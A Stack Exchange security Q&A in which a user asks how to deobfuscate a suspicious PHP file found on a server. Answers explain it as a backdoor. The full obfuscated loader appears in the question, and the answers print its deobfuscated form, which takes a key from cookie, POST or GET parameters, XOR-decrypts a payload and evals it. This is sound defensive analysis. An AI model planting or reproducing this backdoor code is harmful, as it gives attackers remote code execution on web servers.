How to deobfuscate this PHP malware?

Question

Two days ago a file called "images.php" appeared on a friend's server, which he noticed because it caused errors. The file contained the following. This code is of unknown origin and presumed to be malware so DON'T RUN IT.

<?php for($o=0,$e='&\'()*+,-.:]^_`{|,,,|-((.(*,|)`)&(_(*,+)`(-(,+_(-(.(:(](^(_(`({)]+`+{+|,&-^-_(^)](](^(_(^(:(`(,-_(.-_(](:(,+_(-+_(--_(`(.(.+`+_(-(:(.(,+_(--^(.-_(:+{(]+{(:(:(^(`(,(,(,(.(:(:(:+{(,(_(:(_+_(-)](](,(:-_(,,&(_,&+_(-(`(:(.(,(.(.+_(-(.+`(,-_(.(`(](.(_-^(,)](:({(,(,(_(](.(](.-^(,(,(`(,(](:(.({(]-^+_(-(^+_(-(^(.(](,+`(`,&(:+{(.-^(_-_(`-_(]-^+_(-+{(:-^+_(--^(,(_(:(](,(_(`)](:,&(.(,+_(-+{+_(-+|(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](.(.(.(](,+_(-(,,&(^(`(`(^(]-^(,(.(,(.(:-_+_(-(^(_)](.(.(.(](,+_(-(,,&(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](:(^(.-^(,(_(_(](]+|(`(`(.(.+_(--^(,(.(:+{+_(-+`(`+_(-(:(`(:-_(,,&(,-_(.+{(,+_(-(:)](`+_(-(.+{(_+_(-(_+`+_(-)]+_(-(_(,(.(:(`(`)]+_(-,&(:+`+_(--^(.(.(`(_(,-^(:(`(](]+_(-,&+_(-)](^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](:(_(:(,(,-_(`+{(]-^(.(`(`-_+_(-(,(,(^(^-^+_(-(`(,+`(:(_(:+|+_(-({(`+{(],&(,(.(,(.(:-_+_(-(^+_(-)](](:(](^(_(:(`)](^-_(_(:(^+`(_+`(`+_(-(](^(_+_(-(^+{(^+{(^(,+_(-(.(:,&(,(:(:(_(](.(_(:(_,&+_(-(_(]-_+_(-)](^,&(,({(:+`(:+|(,)](:({(]+`(.(:(:(,(]+{(:(.(^(:(^(.(,({(:(:(:(`(]+`(:(_+_(-(.(.-_(:(^(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.(`(](,(.(.+{(.(^(:(](:(^(^(`(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+`(]+|(.(.(:({+_(-)](.(,+_(--^(.(.(.(]+_(--^(_(.+_(--_(^+{(^(,(^({(:,&(,-_(:(^(,(:(.(](:(:(](:(_(.(^-^+_(-(:+_(-({(,,&(.+`+_(-(:(.(,+_(--^(.-_(:+{(]+|(_)](`(_+_(-(]+_(--^(:+|(:+`+_(--^(:+`(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-(`+_(-(],&(.(,+_(-(:(:)](.(.(,-^(.({+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+`(,+`(.+_(-(,(_+_(-)](:+{(,-_(.(_(:+`(:(](.(,(]-^+_(-(`(,({(`(^(`(^(.+`(:(^+_(--_(.(](:(^+_(--_(.+|(^)]+_(-+|(:(](:(`(.+_(-(,(:(.(,+_(--^(:)](`-^(]+|(:(_(^-^+_(-(`(,(`(:-^(,(_(,-_(.+{(,-_(.)](`+_(-(](.(_+|(,,&(`({(,-_(:(`(:-_(,(:(:,&(,-_(_(.(`+_(-(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+`(]+|(.(.(:(_+_(-+`(:(_(,(](_,&(`-_(](.(`-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:-^(,+`(:(_(_)](,(.+_(-)](:,&(:+`(:(^(:+|+_(-+`(.-_(:({(]+|(_)](`(_+_(-(]+_(--^(:+|(:+`+_(--^(:+`(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-(`+_(-(],&(.(:+_(-({(.(^(:(^(:(](.+`(](_+_(-(`(,(^(`(^(`(,(](:(_({(_(,(.-^(:(:(,,&(.+|(^({+_(-(`(](:(`(^(:+_(-(,+{(.(,(:(^(.-_(.-^(,-^(.(_+_(-+_(-(^-^(.+{(:(](.+|(,(](:(,+_(--^(.(:(:)](,(^+_(-+`(^(:(,+`(,(.(.+_(-(.,&+_(-)](`+{(],&(.-_(.-^(,-^(.(_+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+_(-(,+`(:+|(,(_(,-_(.+{(,-_(.)](`+_(-(](`(_,&(^-^+_(-(:+_(-({(,,&(.)](,+{(.(,+_(-)](:-^(:-^+_(-)](:(,(]+`(,-^(,(:(:(:(.+`(:(^(.(,+_(-(:(:)](.(.(,-^(.({(]+`(,-^(,(:(:(:(.+`(:(^(.(,(,(.(.-_(:+`(,(`+_(-+`(^(:(,+`(,-^(:+_(-(.(^+_(-(_(:+{(,+{(:)](,)]+_(-+{(.+`(](_+_(-(`(,(^(.-^(.(^(,(.(:(.+_(-)]+_(-(^(.(_+_(-)](.+`(^(^(.,&(,(](.(.(:+|(,(](.-_+_(-(_(.(.(:(`+_(-({+_(-+`(^(:(,+`(,-^(:+_(-(`(,(](:(_({(_(,(.(:(:(,(](:(_(](^(^+_(-(:(,(^(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+`(^(.+_(-+{(,-^(`+`(`-^(,)](:(.(,(](_+`(:({(,(](:+_(-+_(-(_+_(-(`+_(-(:(:(`(:+`(^(,(`(:(,(](.(^(`(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](.(,(]+`(.+{(.(,(,+`(.+|(^+`+_(-(:(,)](:-^(:+|(],&(`+`(^+_(-(:(`(^+|(](](_+`(^(^+_(-+`(,-^(:+_(-(:(.(]+`(:+`(,+|(_+`(.+_(-(,-^(_(^(^(^+_(-(:(,(^(`(.(:+`(,(^(:,&(,+|(.(:(:+_(-(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.(`(](,(.(.+{(.(^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^(`(](](_(,+`(:(,+_(--^(.+{(^(^(,(_(,(.(:,&(:(`(:(^(:(_+_(-(.(.(:(.(^+_(--_(:(_+_(--^(^(^(,(.(:+|(:(,(:(^(:(](,-_(:-^(`+_(-(](.(_+|(,,&(`({(,-_(:(`(:-_(,(:(:,&(,-_(_(.(`+_(-(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(,)](,+`(.)](^+`(^(^(](`+_(-(.(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{(_)]+_(-(`+_(-(:(:+{(.+`+_(--^(.(,(](.(_,&(:-_(,(^(.+|(_)]+_(-(^(,-^(.(_(,(_(,+{(:-_(,(_(_,&(`-_(](.(`-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:(^(,+`(.+{(_)]+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(_(`-^(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(.+`+_(-(`(.,&(^(`(,+_(-(:(](:+{(:(`(,(:(,+|(,,&(.-_(.(.(:(](.(](^+`+_(--^(](.(`+{(_(.(_(,(:+`(,+|(_(.(`(`(,({(.(](^({(.,&(,({(:,&(:(`(,+|(:+`(,,&(_(:(.,&+_(-(:+_(-+`(^(.+_(-+{(,-^(`+`(`-^(,)](:(.(,(](_+`(:({(,(](:+_(-+_(-(_+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(:(_,&+_(-(_(]-_+_(-)](^,&(,+|(:(`(.,&(]+`(:(,(,(^(.(](:(,(,(.(.(.+_(-(_(,(](,+`(:-^(.+|(,-_(^)](,+|(:-_(:({(,({(:+_(-(^-_+_(-,&(,(^(`(.(.+_(-(:(^(:+`(,(](.(:(,)](,+|(.(,(](.(^+`(]-_(:+|(`(,+_(-+_(-(:+`(,+|(_(.(:-^(,+`(:(_(_)]+_(-+{(,(^(:+{(,(_(,,&(:(_+_(--^(_(:(.,&+_(-)](.(,(](.(,(`+_(-)](:+|(`+_(-(.+`(:+`(,(](.(:(,)](,+|(.(,(](.(^+`(]-_(:+|(`(,(](:(_({+_(-(`(.-_(:+`+_(-({(.(,(^-_+_(-(](](:(:+`(:({+_(-)](,+|(,(:(.(](:-_(:(](.(.(^(:(,(_(:(](:(:(:(^(,(_(`+`+_(-+_(-(_-^(:-^(^(_(,(^(^-_+_(-+|(,(.(,,&(:-^(,-_(.(`(:(^(.+{(:+`(,(`(_,&+_(--_(])]+_(-)](:(`(.,&+_(--_(.+_(-(,(](_(.(`(.(,(:+_(--^+_(-(.+_(-+|(:(_(,)](`-^(,(_(:+|(,)](.+{(:+`(:(](:(:(^(`+_(--^+_(--^(:(`(`-^(:(`(`+`(^+_(-(:(`(.+{(_+_(-(_+`+_(-)](^(.(,({(:+`(:+|(,)](:({(]+`(:)](:(`(,,&(.(,+_(-(_+_(--_(,(](:(_(:+|(_(,(:+`(,+|(_(.(.-^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^(`+{(],&(:)](:(`(,,&(.(,(_)]+_(--_(,(](:(_(:+|(],&(`+`(](:(:+_(-(.-^(:(](.+_(-(^-_+_(-(`(](:(`(^(:+`(,+{(:,&(]+`(.(](:)]+_(--_(_(^(^(:(,+`(,-^(:+_(-(_(:(]+`(.(,(,+{(.+|(:(:(]+{(.({(^)]+_(-(_(,-^(`(.(:({(,)](.(`(,(:(:+|(:(:(]+|(_+|(,,&(,-_(_+_(-(`,&(`(_+_(-)](:-^(,+{(:({(.(.(]+{(.(,(]-^+_(-(`(,({(`(.(:+_(-(,-_(:-_+_(-+`(.-_(.(]+_(-({(]-_(^(,(,(`(,(^(:+_(-(.,&(,(:(:+|(,(](_+`(.-^(:(](:(^(^(`(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(](.(_-^(:(^(](.(:-^(`(_(,(.(,+`(.+_(-(.+`+_(--^(:+{+_(-({(:-_(`-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](.+_(-(.(,+_(-)](.(`(,-_(.(`(`-^(]-_(.(_+_(--_(,)](.+{(.+_(-(.(,+_(-)](.(`(,-_(.(`(`-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](.+_(-(:+_(-(,-_(:-_(,(_+_(-(^(:(:+_(-(:(.(,(^(^(^+`(]-_(:+_(-(`(,+_(-+_(-(:(_(,)](.(.(:)](]+{(,(^(](^+_(-+`(,-^(:-^(:(^(:(^(:(_+_(-(.(.-_(:(^(](:(_+_(-(^(^(^+{(^(,(.-_(^(:(,+|(.(_(,(](.)](.(.(,(.(.+`(^({(^(.+_(-(:(,,&(.)](,(^(.(:(,-_(.(](`-^(]-_(.(_+_(--_(,)](]-_(:,&(_(.(,(:(:(^(](.(_(.(`(.(,,&(`({(`(_(,(.(,(](.(.(:+|(,(](`+{(]-^(.)](`+`(]+|(:(`+_(-+_(-(^+{(](.(`+{(.(.+_(-,&(:+{(,(:(.(_(:(:(](:(_(](`(_+_(-(](,-^(:,&(:-_(](.(`(`(,+|(_(:(`-_+_(-(,(_+_(-(^)](^+|(^(_+_(-(.(:-_(,,&(:(_+_(--^(:)](`-^(]-_(.(:+_(--_(])]+_(-(_+_(-(.(.)](,)](:-_(,(^(:)](:(:(](:(_+_(-(^(,(^+{(^(,(.-_(:+|(,)](:+{(,(^(_+`(`(.(,(](`-^(]+{(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,(.+_(-)](:,&(:+`(:(^(:+|+_(-+`(.-_(:({(](:(_+_(-(^(^(^+{+_(-(,(`(_(:(_(^+_(-(:+`(,+|(_(.+_(-(_(,(.(:(_(_)](,(,(,-^(.+_(-(:(_+_(--_(.+_(-(,)](.-_(`-^(]-_(:(^(,+{(:(.+_(-+{(.(,(:(_(,)](,+|(,(^(:+`(:(:(,(^(_,&+_(-(.+_(-+_(-(](`(:(:(.+{+_(-({(:(.+_(-(:(_(.(_(_(^(_(`+{(^(`(,(,+_(-)](:(:(.(,(](.(`(]+_(-+`(.(:(.(_(,-^(_(.+_(-+`(^(^+_(-)](`(^(`(,(](_(_(.(^(`(`(](:(`+_(-)](:(`(^(`(,+{(](:(`(^(.)](,(:(.(:(,-_(_,&(`+`(]+|(:(.+_(-+_(-(^+{(](`(_(,(_(](^(](:(.+_(-({(:({(:(`+_(-(.(_,&+_(-+_(-(,(.(,(.(.(.(:+|(],&(`-_(],&(:,&(`+_(-(](.(_+|+_(-+`(^(_(,,&(`+{(`(,(](:(.({(.+`(.+|(:(^(,(`(.+`(](^+_(-(`(](:(`(_(:-_(:+_(-(_(:(:(`(_(:(_,&+_(-+|(.,&(^-_+_(--^(,-^(`+`(`({(.+`(:(^(,-_(.(^(:(,(](:(_+_(-(^(,(.)](^+`(,-_(`(,(](:(.({(]-^(.(^(`({(^(_(,(^(^(,+_(-(^(,-^(.(_(.+`(](.(`(`(,+|+_(-+_(-(_(`(:(_(_+|(,,&(,-_(.+{(:(](:+`(,(_(:+|+_(-)](.-_(`-^(]-_(.(:(_,&(](:(:(_(`+{(_(.(.+`(.(:+_(-({(.(^(:(^(:(](.(_(^+`+_(-,&+_(-({(:(`(`+_(-(]-^(.(:(](:(`+_(-(.+{(,-^(.(_(^-^+_(-,&(]+{(`(_(:(_(^+_(-(.-^(_(,(.+|(.(:(,(^(.(_(](.+_(-+{(,(](:+|(`)]+_(-(.(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(.)](`,&(,(^(_({(.+`(.-_(.-^(,-^(.(_+_(--^(^(_(,({(`-^(`,&(,(^(`+`(^+_(-(.-_(:(^(,(:(.+`+_(-(_(:(.(,(.(:-_(.)](,(_(:+|(,-^(.-_(`-^(])]+_(-)](^({(^(,(](`(`(_(:(_(](:(_({+_(-(`(](,(`)](](](.+_(-(^)](^(.+_(-({(:-_(:({+_(-({(.(`(]+`(.+|(:(:+_(--_(.(_(^-^(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(](`(`(_(.)](](_(`(`+_(-({(_(_(`(.(,(`(_+|(:+|(,)](_+_(-(^+{(:(,(,+|(`+{(]-^(:)](_+{(.+{(.(:(](^+_(-,&(,({(:)](:(_+_(-+`(:(_(,(](_(.(`(.(,+`(_)]+_(-(.(,(.(](.(`+{(^(:(_(:(.({(_(,(](:(^-_(,(.(.(:+_(--^(^(_(,,&(_-_+_(-)](,+|(:+|+_(-+`(.-_(:({(](:(_+_(-(^+`(^-^(])](.(^(:+{(]({(`+`(](:(](,(^-_(_(.(:-^(:+|(`+{(_(.(^+{+_(-)](,+|(.(]+_(-({(.(:(.(.(,-^(_,&+_(-(.(,+_(-(](`(`(,+_(--^(.-_(,(`(]+`(_({(`({(]-_(:(`+_(-({(^(,(]+{+_(-+`(,,&(:-^(,(:(](^(`+{(`({(^+{+_(-)](](](.-^(,(^(,-^(.+{(:(_(:,&(]({(_(:(_,&(_+_(-(]+|(:-_(`+{+_(-+|(:+`(:(,(,(_(:(_(](.(_+{+_(-(_(,,&(.(,(^)]+_(-(](](:(`(_(.+`(](:(`+`(_(,(](:(^-_(_(.(:-^(:+|(`+{(_(.(^+{(^(,(]-^(:+_(-(^(`(,+`(:(,+_(-)](.(,(^(`+_(-(_(](:(`(_(.+`(](_(_+{(^+{(`(:(_(](](.(`-^(:+|(`+{(_(.(^+{(^(,(.+`(:(^+_(-,&(:({(:-_+_(--_(.(,+_(--^(^(_(,,&(`-^(`,&(,({(`+`(^+_(-(](,(^-_(_(.(]+|(]+{(`({(_(.(^+{(^(,(.+`(:(^(,)](.(_(:)]+_(-({(.(,+_(--^(^(_(,,&(`+{(_(.(_(,(^+`(_(:(](:(:(:(,({(.,&(^)](^(.(])]+_(-,&+_(-(.(:(_(:,&(]({(`+_(-(^+|(_(.(]+|(]+{(`({(_(.(^+{+_(-)](,+|(:(,(,(_(.(^(.(^(,-^(_,&+_(-(.(,+_(-(](.(_)](^(:(_(:(.-^(_(,(:(`(^+|(](](_+`(^(.+_(-,&(]+{(.+_(-(:(](,+{(.+_(-+_(--^(_+`(:(:+_(-(:(.(,(^(^(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,+_(-(,(_(:(:(.+{+_(--^(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(^({(.(.(_(,(^+`(,(:(.+|(`-^(]-_(.(_(,+{(]-_(^(_(`(,(.-^(,(.(:+`(,)](.(.(`(_+_(-({(:(,(](_+_(-(`+_(-)](:(](:+|+_(--^(:(,(,(.(_+`(_(`(^(^(_(^+_(-)]+_(-(_(,-^(.(](`(_(,(](.(_(,(_(.(_(`(_(^)](`+{+_(-(_(^,&(,-_(:(`(.-_(](^(:,&+_(--_(.(_(:+`(]+{(_(:+_(-(,(^(.(,-^(:+_(-(:+_(-(,(^(`(:(.(^(,+_(-(`(](](.(]-_(:-_(,)](_+_(-(^+{(^(,(,-_(:(,(,(.(.(^(`(_(])](,+`(`,&(.-^(,(^(`(,(_(.(_(,(^+`+_(-(`(](,(^-_(,-^(.)](](^+_(-(`(,(.(:(](`+_(-(.+`(.(,+_(--^(:({(.(^+_(--_(:(`+_(--^(^(_(,({(`-^(`+{+_(-)](.(_+_(-+`(.-_(.(](,,&(.(,(](.+_(-+_(-(,(:(`(,(`(,(](:(^)](_(:(:+_(-(^+|(_(.(]+|+_(-(.+_(-(:(^(_+_(-(.(:+|+_(-(.(.(:(,(_(.(^(:(.(,-^(_,&+_(-+_(-(^(.(]+|(`-^(`,&(,)](`+`(^+_(-(](,(^-_(_(.(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(:(,(_(:(,(](](_(`(`(,+{+_(-+_(-(_(](:(_(_)]+_(-(.+_(-(:(:(,(_+_(-(,(](](_(`(`(,+{+_(-+_(-(_(.(:(_(_+|(,,&(`({(_(.(.-_(^(:(_(:(:(_(,(_(:)](:(:(,(.(.(:+_(--^+_(-+`(,+`(.+_(-(,(_+_(-+`(:(.+_(-)](:)](.(.(,(:(:(`(](:(^+{+_(-(,(.+`(,(_+_(-+`(:(.+_(-)](:)](.(.(,(:(:(`(](:(^+`(]-_(:+_(-(`(,(^+_(-(.-^(_(,(](:(:(:(,(`(:(_(^(:+_(-+{(,,&(`+`(:+_(-(,+{(.(,(:(^(:)](.-_+_(-({(:+_(-(^(:+_(--_(](.(.)](.+_(-(:(^(.(,+_(-(:(:)](.(.(,-^(.({+_(--^(^(_(,({(`+{(_(.+_(-(`(^)](_(:(.-_(:+`+_(-({(.(,(^-_+_(-(](](:(:+`(:({+_(-)](,+|+_(-)](.(.(:(:(,(`(.)](_)]+_(-(`+_(-(:(:(`(:+`(](:(.({+_(-(.+_(-(^(.(^(,(:(.(,(^+`+_(--^(:(](:(`(.+_(-(,-_(:(,(](.(_-^(:(^(](.(`-^(]+{(`({(_(.(:(`(:(^+_(-)](:(_(,(:(.+|(`-^(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(](:(:+_(-(.-^(:(](:(^(^)](,(.(,-^(:+|(`+_(-(]-^(:(,(](:(`+_(-(.+{(_+_(-(]+|(^(:+_(--^+_(-({(:(`(:(,(,+|(`+{(,(.(.+{(.(^(:(](:(^(](]+_(-,&(,({(,,&(:(_+_(-+`(:(_(,(](_(:(.,&+_(-(:+_(-+`(](_(,(,(,(](:+_(-(,(_(,(^(.(:(,-_(.(](`-^(]-_(.(_+_(--_(])]+_(-(_(^({(^(,(,-_(:-_+_(-)](.-_(:-_(,,&(_,&(^-^+_(-(:+_(-({(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+`(^(:(,+`(,-^(:+_(-(`+_(-(]-^(:(,(](:(`+_(-(.+{(_+_(-(:({(:+|(^,&(](](:(^(:(_(_(,(`(`(,(](`(`(`+_(-(:({(.-_(`+|(.(](,(,+_(-(`(_-_+_(-({(:({(:({+_(-(:(:+|(]+|(`-^(:+|(^(_(,({(_-_(`,&(:(^+_(-(,(.(^(,(^+_(-,&(.(.(,(,(_,&(^(_(,(^(,-_(_(.(_(,(:+`(,+|(_(.+_(-(_(,-^(.({(](_(,(_+_(-(.(`+`(`,&(,)](`+`(](:(:+_(-(`(.(,({(`({+_(-(.(.,&(:+{+_(-,&(,+`(:-^(,({(]-^(.(](,+{(^(,(:({(:+|+_(-+{(,,&(`+`+_(-)](,-_(:-^+_(-+`(:-^(.-_(](:(_+_(-(^(^(^+{(](.(.)](`,&(,)](_-^(]-^+_(-(^+_(-+_(-(.-^+_(-+_(-(_,&(^(_(,(^(,-_(_(.+_(-(`(^)](,(:(.+|(`-^(.+{(.(.(^(:(,(_(:(](:-_(:({(,,&(:+`(,)]+_(-(^(.(`+_(--^(.+`(](.+_(-(`+_(-({(,,&(:-^+_(-+`(:(,(](.(_(:(`-_+_(-(,(_+_(-(^(^(]-_+_(-({(.(_(.+{(,(:(.(:+_(-)](.(_(:(`+_(-({(.,&(^(:(,+_(-(](:(`(_(:+`(](:(_({+_(-(`(](,(.-^(:(](:(_(^+{+_(-(:+_(-)](.(_(,(_(,-_(.+{(,-_(.)](`-^(]-_(.(_+_(--_(])](_+_(-(-(_(*,*)`(-(-)^*&,|-(,*(.(*,++^(*,|+`(:)^(*,|(^(^(:-^,:,,(.(*,|)_)\'),(:-^(*,.+^(*,++^(*,|+`+`)`(*,|)^-`,+,_-),+-^(*,*({)`*&,),.-((.(.(*,.+^(*,++^(*,|+`+`)_)_)*(:(^(.(*,.+^(*,++^(^(^(*,|+`+`(:(:)^-`-`,:,,(.(\'*&,:-)-),+-*(.(*+|+)*++(+,*++((:(:-^(*+|*)*|*|*^*:*+)`(,(**.+*+*+&+|*)*|*|*^*:*++|+,*\'+(+))^(*+|+&*|+)+*)`(,(**.+*+*+&+|+&*|+)+*+|+,*\'+(+))^(*+|*-*++*)`(,(**.+*+*+&+|*-*++*+|+,*\'+(+))^-`(*,^)`(*+|*)*|*|*^*:*++^(-,^,+-:(-+`)^,:,,(.,+,`-&-*-:(.(*,^(:(:-^(*,^)`(*+|+&*|+)+*+^(-,^,+-:(-+`)^-`,:,,(.,+,`-&-*-:(.(*,^(:(:-^(*,^)`(*+|*-*++*+^(-,^,+-:(-+`)^-`,:,,(.(\'*&,,-+,{,)-*,:,|,{+|,+-.,:-)-*-)(.(-,*,+,)-(-:-&-*(-(:(:-^,+-,,\',_(.(-,,-+,{,)-*,:,|,{(&,*,+,)-(-:-&-*(.(*,+(_(*,^(:-^,:,,(.(\'(*,^(:-^-(,+-*-+-(,{)^-`(*,+,_)`*&-)-*-(,_,+,{(.(*,+(:)^(*,^,_)`*&-)-*-(,_,+,{(.(*,^(:)^(*-(,_)`(*,+,_(+(*,^,_)^(*,,,_)`(*,+,_(`(*-(,_)^,,,|-((.(*,|)`)&)^(*,|)_(*,,,_)^(*,|(^)`(*,^,_(:-^(*-&)`*&-)-+,(-)-*-((.(*,+(_(*,|(_(*,^,_(:)^(*,*({)`(((*,^((+{(((*-&(()^-`,:,,(.(*-(,_(:-^(*-&)`*&-)-+,(-)-*-((.(*,+(_(*,,,_(_(*-(,_(:)^(*,^)`*&-)-+,(-)-*-((.(*,^(_)&(_(*-(,_(:)^(*,*({)`(((*,^((+{(((*-&(()^-`-(,+-*-+-(,{(.(*,*(:)^-`(-(:)^-`(*,*)`*&,*,+,)-(-:-&-*(.(*,*(_(*,^(:)^,+-,,\',_(.(*,*(:)^',$d='';@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?>

I replaced the eval with an echo, ran it on phpfiddle, and got more of the same obfuscation, this time with multiple eval lines.

What is the best way to deobfuscate this sort of thing so I can figure out what it's doing?

Sorry for the inconvenience, my point was not to bother or even notify you. We currently have a recrudescence of people asking how to deobfuscate some PHP code. The *duplicate* system allows such people to find the most thorough post covering the issue they are encountering while they may not use the exact right keywords. The point of the SE notification was to warn you that your post may be used this way as, even after 3 years, this post remains your own and you still have your word to say if you do not agree with what is being done with it. — WhiteWinterWolf, Jul 25 '17 at 08:34

thexacre · Accepted Answer · 2014-05-02T09:41:43.790

It's usually very difficult for malware creators to obfuscate the exec() or eval() call, so a good technique is to replace these calls with an echo. If you do that for the above code you end up with a whole heap more obfuscated code, but it's mostly garbage except for what's at the bottom:

if(!@isset($_SERVER)){$_COOKIE=&$HTTP_COOKIE_VARS;$_POST=&$HTTP_POST_VARS;$_GET=&$HTTP_GET_VARS;}$k=$_COOKIE['key'];if(empty($k)){$k=$_POST['key'];}if(empty($k)){$k=$_GET['key'];}if(!@function_exists('decrypt')){eval('function decrypt($e,$k){if(!$k){return;}$el=@strlen($e);$kl=@strlen($k);$rl=$el%$kl;$fl=$el-$rl;for($o=0;$o<$fl;$o+=$kl){$p=@substr($e,$o,$kl);$d.="$k"^"$p";}if($rl){$p=@substr($e,$fl,$rl);$k=@substr($k,0,$rl);$d.="$k"^"$p";}return($d);}');}$d=@decrypt($d,$k);eval($d);

If you clean this up nicely (thanks IntelliJ) with some comments I've added:

// Compatibility with really old versions of PHP I think
if (!@isset($_SERVER)) {
    $_COOKIE =& $HTTP_COOKIE_VARS;
    $_POST =& $HTTP_POST_VARS;
    $_GET =& $HTTP_GET_VARS;
}
// If there's a cookie called "key" set $k to be the payload
$k = $_COOKIE['key'];
if (empty($k)) {
    $k = $_POST['key'];
}
// If there's no cookie then get the payload from a get parameter called 'key'
if (empty($k)) {
    $k = $_GET['key'];
}

// Define a function to de-obfuscate the payload
if (!@function_exists('decrypt')) {
    eval('function decrypt($e,$k){if(!$k){return;}$el=@strlen($e);$kl=@strlen($k);$rl=$el%$kl;$fl=$el-$rl;for($o=0;$o<$fl;$o+=$kl){$p=@substr($e,$o,$kl);$d.="$k"^"$p";}if($rl){$p=@substr($e,$fl,$rl);$k=@substr($k,0,$rl);$d.="$k"^"$p";}return($d);}');
}
// Set $d to the de-obfuscated payload
$d = @decrypt($d, $k);

// eval $d
eval($d);

Which is much easier to understand.

So basically they're:

Looking for a cookie named key
If there's no cookie then check the get parameters
De-obfuscate the payload obtained from a cookie or get parameter
eval that code

The reason why they bother to obfuscate the payload they're passing in the cookie or get parameter is to reduce the chances it'll get picked up by an IDS which looks for PHP code or that someone will spot it in logs.

Thanks that was very helpful. So it looks like the purpose of this script is to provide a way that the creator can send code to the server later which will be passed through a complicated decrypt function and executed? — Robert, May 03 '14 at 21:39
I posted a [follow up question](http://security.stackexchange.com/questions/57208/shared-hosting-hacked-should-i-report-this-to-someone-does-anyone-care) to ask, who (if anyone) should I report this to? — Robert, May 03 '14 at 22:06
They will most likely use it to send spam, but they're leaving their options open. — thexacre, May 04 '14 at 00:06

score 9 · Answer 2 · answered May 06 '14 at 16:09

I've fully de-obfuscated the code, just for fun.

First some comments on the naughty side of the code. Use of the @ operator is applied to almost every function call. This will suppress warnings that could be generated by the code, so helps to keep it hidden from sysadmins who regularly check their logs.

NB, I don't know why the definition of the decrypt() function takes place in an eval(). The code works exactly the same if you just declare the function as-is in the if's true clause.

Here's the code in full again:

// Compatibility for old versions of PHP which used different variable naming
if (!@isset($_SERVER)) {
    $_COOKIE =& $HTTP_COOKIE_VARS;
    $_POST =& $HTTP_POST_VARS;
    $_GET =& $HTTP_GET_VARS;
}
// If there's a cookie called "key" set $k to be the payload
$k = $_COOKIE['key'];
if (empty($k)) {
    $k = $_POST['key'];
}
// If there's no cookie then get the payload from a get parameter called 'key'
if (empty($k)) {
    $k = $_GET['key'];
}

// Define a function to de-obfuscate the payload
if (!@function_exists('decrypt')) {
    eval('function decrypt($e,$k){if(!$k){return;}$el=@strlen($e);$kl=@strlen($k);$rl=$el%$kl;$fl=$el-$rl;for($o=0;$o<$fl;$o+=$kl){$p=@substr($e,$o,$kl);$d.="$k"^"$p";}if($rl){$p=@substr($e,$fl,$rl);$k=@substr($k,0,$rl);$d.="$k"^"$p";}return($d);}');
}
// Set $d to the de-obfuscated payload
$d = @decrypt($d, $k);

// eval $d
eval($d);

And now let's look deeper into the decrypt() function. Cleaned up, it looks like this:

function decrypt($encrypted_string, $key)
{
    if(!$key)
        return;

    $encrypted_string_len = @strlen($encrypted_string);
    $key_len = @strlen($key);
    $rl = $encrypted_string_len % $key_len;
    $fl = $encrypted_string_len - $rl;

    for($o=0; $o < $fl; $o += $key_len)
    {
        $p = @substr($encrypted_string, $o, $key_len);
        $d .= "$key" ^ "$p";
    }

    if($rl)
    {
        $p = @substr($encrypted_string, $fl, $rl);
        $key = @substr($key, 0, $rl);
        $d .= "$key" ^ "$p";
    }
    return($d);
}

This is a simple XOR-based encryption scheme. The key is taken and the length relative to the message is evaluated. If the key length divides into the message length exactly, then it loops through the message taking chunks the length of the key and performing a XOR on the entire string (^ operator`), then builds up the decrypted result. If it doesn't divide exactly, the remaining chunk is XOR'd with the beginning of the key up to the necessary length.

